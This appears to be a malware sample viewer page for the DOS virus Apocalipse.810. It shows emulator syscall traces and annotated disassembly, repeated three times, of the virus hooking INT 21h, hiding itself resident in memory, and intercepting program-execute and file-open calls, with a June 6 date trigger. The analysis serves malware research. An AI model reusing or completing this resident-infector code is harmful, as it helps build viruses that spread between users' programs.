Sample viewer

vx.netlux.org/Virus.DOS.Apocalipse.810

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:52:18.835565849Z 119 PC: 12a48 | UNKNOWN!
2018-12-17T22:52:18.839220089Z 42 PC: 12a51 | Get date 0x12a51: cmp dx, 0x606
; Excerpt that follows the DOS Get date call (INT 21h, AH=2Ah; returns DH=month, DL=day).
; The preceding `cmp dx, 0x606` tests for month 6, day 6 (June 6).
0x12a55: jne 0x12a5a ; any other date: skip the call below
0x12a57: call 0x12c91 ; date-gated routine; its body is outside this excerpt
; INT 21h AH=4Ah (resize memory block) with BX=0xFFFF paragraphs: a request that
; cannot be met, so DOS reports the largest available size back in BX.
; NOTE(review): ES is presumably the program's own block; it is set outside this excerpt.
0x12a5a: mov ah, 0x4a
0x12a5c: mov bx, 0xffff
0x12a5f: int 0x21
0x12a61: sub bx, 0x34 ; keep all but 0x34 paragraphs of the reported maximum
0x12a64: nop
0x12a65: mov ah, 0x4a ; second resize: shrink the block to the reduced size
0x12a67: int 0x21
0x12a69: mov ah, 0x48 ; INT 21h AH=48h: allocate memory
0x12a6b: mov bx, 0x33 ; 0x33 paragraphs = 816 bytes, taken from the space just freed
0x12a6e: int 0x21
0x12a70: jb 0x12ac1 ; CF set = allocation failed; 0x12ac1 is where the trace logs the return from Set interrupt vector, so this path appears to skip the hook
0x12a72: dec ax ; AX = allocated segment; AX-1 = the paragraph holding its memory control block (MCB)
0x12a73: mov es, ax
0x12a75: mov word ptr es:[1], 8 ; MCB owner word := 8, the value DOS uses for system-owned blocks, so the block is presumably kept after the host program exits
0x12a7c: push ax ; MCB segment saved for code outside this excerpt
; INT 21h AH=35h, AL=21h: read the current INT 21h vector (returned in ES:BX).
; The trace row for this call prints the vector in decimal ('33' = 0x21); its
; "AKA 'Random read'" text appears to name DOS function 21h, not the interrupt.
0x12a7d: mov ax, 0x3521
0x12a80: int 0x21
2018-12-17T22:52:18.842072307Z 74 PC: 12a61 | Reallocate memory
2018-12-17T22:52:18.844235863Z 74 PC: 12a69 | Reallocate memory
2018-12-17T22:52:18.846062532Z 72 PC: 12a70 | Allocate memory
2018-12-17T22:52:18.850252905Z 53 PC: 12a82 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:52:18.851815594Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '37' AKA 'Set interrupt vector')
2018-12-17T22:52:18.853787163Z 37 PC: 12ac1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:52:18.857599001Z 44 PC: 12ad5 | Get time 0x12ad5: cmp dl, 1
; Excerpt that follows the DOS Get time call (INT 21h, AH=2Ch; returns DL=hundredths of a second).
; The preceding `cmp dl, 1` gates the call below on that value.
0x12ad8: ja 0x12add ; DL > 1 (unsigned): skip the call
0x12ada: call 0x12c52 ; reached only when DL is 0 or 1; body is outside this excerpt
0x12add: mov ax, 0x100 ; 0x100 is the offset at which a DOS .COM image starts
0x12ae0: jmp ax ; near jump to offset 0x100; presumably returns control to the host program (confirm against the full sample)
0x12ae2: int 0x20 ; DOS terminate; not reached by fall-through from the jmp above
0x12ae4: nop
0x12ae5: jmp 0x12ae8
; From 0x12ae8 the code dispatches on AX/AH and can return with iret, so it runs
; as an interrupt handler. Given the Set interrupt vector row for interrupt 33
; (0x21) in the trace, this is presumably the replacement INT 21h handler; its
; exact entry point is not shown here.
0x12ae8: cmp ax, 0x7777 ; AX=0x7777 is answered by the handler itself
0x12aeb: jne 0x12af1
0x12aed: mov ax, 0x6952 ; reply value; the 0x7777 -> 0x6952 exchange looks like an "already resident" query and is a candidate memory indicator for this sample
0x12af0: iret
0x12af1: cmp ax, 0x4b00 ; AX=4B00h: DOS load-and-execute program
0x12af4: je 0x12b56 ; handling for program execution; target outside this excerpt
0x12af6: cmp ah, 0x3d ; AH=3Dh: DOS open file
0x12af9: jne 0x12afe
0x12afb: jmp 0x12c0f ; handling for file open; target outside this excerpt
0x12afe: cmp ah, 0x11 ; AH=11h: DOS find first file (FCB)
0x12b01: je 0x12b0b
0x12b03: cmp ah, 0x12 ; AH=12h: DOS find next file (FCB); the excerpt ends before the branch

{"DateBased":true,"Day":6,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10846,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:21.668556449Z 119 PC: 12a48 | UNKNOWN!
2018-12-25T12:29:21.670031849Z 42 PC: 12a51 | Get date 0x12a51: cmp dx, 0x606
; Excerpt that follows the DOS Get date call (INT 21h, AH=2Ah; returns DH=month, DL=day).
; The preceding `cmp dx, 0x606` tests for month 6, day 6 (June 6).
0x12a55: jne 0x12a5a ; any other date: skip the call below
0x12a57: call 0x12c91 ; date-gated routine; its body is outside this excerpt
; INT 21h AH=4Ah (resize memory block) with BX=0xFFFF paragraphs: a request that
; cannot be met, so DOS reports the largest available size back in BX.
; NOTE(review): ES is presumably the program's own block; it is set outside this excerpt.
0x12a5a: mov ah, 0x4a
0x12a5c: mov bx, 0xffff
0x12a5f: int 0x21
0x12a61: sub bx, 0x34 ; keep all but 0x34 paragraphs of the reported maximum
0x12a64: nop
0x12a65: mov ah, 0x4a ; second resize: shrink the block to the reduced size
0x12a67: int 0x21
0x12a69: mov ah, 0x48 ; INT 21h AH=48h: allocate memory
0x12a6b: mov bx, 0x33 ; 0x33 paragraphs = 816 bytes, taken from the space just freed
0x12a6e: int 0x21
0x12a70: jb 0x12ac1 ; CF set = allocation failed; 0x12ac1 is where the trace logs the return from Set interrupt vector, so this path appears to skip the hook
0x12a72: dec ax ; AX = allocated segment; AX-1 = the paragraph holding its memory control block (MCB)
0x12a73: mov es, ax
0x12a75: mov word ptr es:[1], 8 ; MCB owner word := 8, the value DOS uses for system-owned blocks, so the block is presumably kept after the host program exits
0x12a7c: push ax ; MCB segment saved for code outside this excerpt
; INT 21h AH=35h, AL=21h: read the current INT 21h vector (returned in ES:BX).
; The trace row for this call prints the vector in decimal ('33' = 0x21); its
; "AKA 'Random read'" text appears to name DOS function 21h, not the interrupt.
0x12a7d: mov ax, 0x3521
0x12a80: int 0x21
2018-12-25T12:29:23.25732117Z 74 PC: 12a61 | Reallocate memory
2018-12-25T12:29:23.259030818Z 74 PC: 12a69 | Reallocate memory
2018-12-25T12:29:23.260466314Z 72 PC: 12a70 | Allocate memory
2018-12-25T12:29:23.262746199Z 53 PC: 12a82 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:29:23.264189096Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '37' AKA 'Set interrupt vector')
2018-12-25T12:29:23.266122371Z 37 PC: 12ac1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:29:23.26895069Z 44 PC: 12ad5 | Get time 0x12ad5: cmp dl, 1
; Excerpt that follows the DOS Get time call (INT 21h, AH=2Ch; returns DL=hundredths of a second).
; The preceding `cmp dl, 1` gates the call below on that value.
0x12ad8: ja 0x12add ; DL > 1 (unsigned): skip the call
0x12ada: call 0x12c52 ; reached only when DL is 0 or 1; body is outside this excerpt
0x12add: mov ax, 0x100 ; 0x100 is the offset at which a DOS .COM image starts
0x12ae0: jmp ax ; near jump to offset 0x100; presumably returns control to the host program (confirm against the full sample)
0x12ae2: int 0x20 ; DOS terminate; not reached by fall-through from the jmp above
0x12ae4: nop
0x12ae5: jmp 0x12ae8
; From 0x12ae8 the code dispatches on AX/AH and can return with iret, so it runs
; as an interrupt handler. Given the Set interrupt vector row for interrupt 33
; (0x21) in the trace, this is presumably the replacement INT 21h handler; its
; exact entry point is not shown here.
0x12ae8: cmp ax, 0x7777 ; AX=0x7777 is answered by the handler itself
0x12aeb: jne 0x12af1
0x12aed: mov ax, 0x6952 ; reply value; the 0x7777 -> 0x6952 exchange looks like an "already resident" query and is a candidate memory indicator for this sample
0x12af0: iret
0x12af1: cmp ax, 0x4b00 ; AX=4B00h: DOS load-and-execute program
0x12af4: je 0x12b56 ; handling for program execution; target outside this excerpt
0x12af6: cmp ah, 0x3d ; AH=3Dh: DOS open file
0x12af9: jne 0x12afe
0x12afb: jmp 0x12c0f ; handling for file open; target outside this excerpt
0x12afe: cmp ah, 0x11 ; AH=11h: DOS find first file (FCB)
0x12b01: je 0x12b0b
0x12b03: cmp ah, 0x12 ; AH=12h: DOS find next file (FCB); the excerpt ends before the branch

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10846,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:21.790463886Z 119 PC: 12a48 | UNKNOWN!
2018-12-25T12:29:21.791747923Z 42 PC: 12a51 | Get date 0x12a51: cmp dx, 0x606
; Excerpt that follows the DOS Get date call (INT 21h, AH=2Ah; returns DH=month, DL=day).
; The preceding `cmp dx, 0x606` tests for month 6, day 6 (June 6).
0x12a55: jne 0x12a5a ; any other date: skip the call below
0x12a57: call 0x12c91 ; date-gated routine; its body is outside this excerpt
; INT 21h AH=4Ah (resize memory block) with BX=0xFFFF paragraphs: a request that
; cannot be met, so DOS reports the largest available size back in BX.
; NOTE(review): ES is presumably the program's own block; it is set outside this excerpt.
0x12a5a: mov ah, 0x4a
0x12a5c: mov bx, 0xffff
0x12a5f: int 0x21
0x12a61: sub bx, 0x34 ; keep all but 0x34 paragraphs of the reported maximum
0x12a64: nop
0x12a65: mov ah, 0x4a ; second resize: shrink the block to the reduced size
0x12a67: int 0x21
0x12a69: mov ah, 0x48 ; INT 21h AH=48h: allocate memory
0x12a6b: mov bx, 0x33 ; 0x33 paragraphs = 816 bytes, taken from the space just freed
0x12a6e: int 0x21
0x12a70: jb 0x12ac1 ; CF set = allocation failed; 0x12ac1 is where the trace logs the return from Set interrupt vector, so this path appears to skip the hook
0x12a72: dec ax ; AX = allocated segment; AX-1 = the paragraph holding its memory control block (MCB)
0x12a73: mov es, ax
0x12a75: mov word ptr es:[1], 8 ; MCB owner word := 8, the value DOS uses for system-owned blocks, so the block is presumably kept after the host program exits
0x12a7c: push ax ; MCB segment saved for code outside this excerpt
; INT 21h AH=35h, AL=21h: read the current INT 21h vector (returned in ES:BX).
; The trace row for this call prints the vector in decimal ('33' = 0x21); its
; "AKA 'Random read'" text appears to name DOS function 21h, not the interrupt.
0x12a7d: mov ax, 0x3521
0x12a80: int 0x21
2018-12-25T12:29:21.794547982Z 74 PC: 12a61 | Reallocate memory
2018-12-25T12:29:21.796233412Z 74 PC: 12a69 | Reallocate memory
2018-12-25T12:29:21.798420183Z 72 PC: 12a70 | Allocate memory
2018-12-25T12:29:21.80003285Z 53 PC: 12a82 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:29:21.80120597Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '37' AKA 'Set interrupt vector')
2018-12-25T12:29:21.802946018Z 37 PC: 12ac1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:29:21.805079834Z 44 PC: 12ad5 | Get time 0x12ad5: cmp dl, 1
; Excerpt that follows the DOS Get time call (INT 21h, AH=2Ch; returns DL=hundredths of a second).
; The preceding `cmp dl, 1` gates the call below on that value.
0x12ad8: ja 0x12add ; DL > 1 (unsigned): skip the call
0x12ada: call 0x12c52 ; reached only when DL is 0 or 1; body is outside this excerpt
0x12add: mov ax, 0x100 ; 0x100 is the offset at which a DOS .COM image starts
0x12ae0: jmp ax ; near jump to offset 0x100; presumably returns control to the host program (confirm against the full sample)
0x12ae2: int 0x20 ; DOS terminate; not reached by fall-through from the jmp above
0x12ae4: nop
0x12ae5: jmp 0x12ae8
; From 0x12ae8 the code dispatches on AX/AH and can return with iret, so it runs
; as an interrupt handler. Given the Set interrupt vector row for interrupt 33
; (0x21) in the trace, this is presumably the replacement INT 21h handler; its
; exact entry point is not shown here.
0x12ae8: cmp ax, 0x7777 ; AX=0x7777 is answered by the handler itself
0x12aeb: jne 0x12af1
0x12aed: mov ax, 0x6952 ; reply value; the 0x7777 -> 0x6952 exchange looks like an "already resident" query and is a candidate memory indicator for this sample
0x12af0: iret
0x12af1: cmp ax, 0x4b00 ; AX=4B00h: DOS load-and-execute program
0x12af4: je 0x12b56 ; handling for program execution; target outside this excerpt
0x12af6: cmp ah, 0x3d ; AH=3Dh: DOS open file
0x12af9: jne 0x12afe
0x12afb: jmp 0x12c0f ; handling for file open; target outside this excerpt
0x12afe: cmp ah, 0x11 ; AH=11h: DOS find first file (FCB)
0x12b01: je 0x12b0b
0x12b03: cmp ah, 0x12 ; AH=12h: DOS find next file (FCB); the excerpt ends before the branch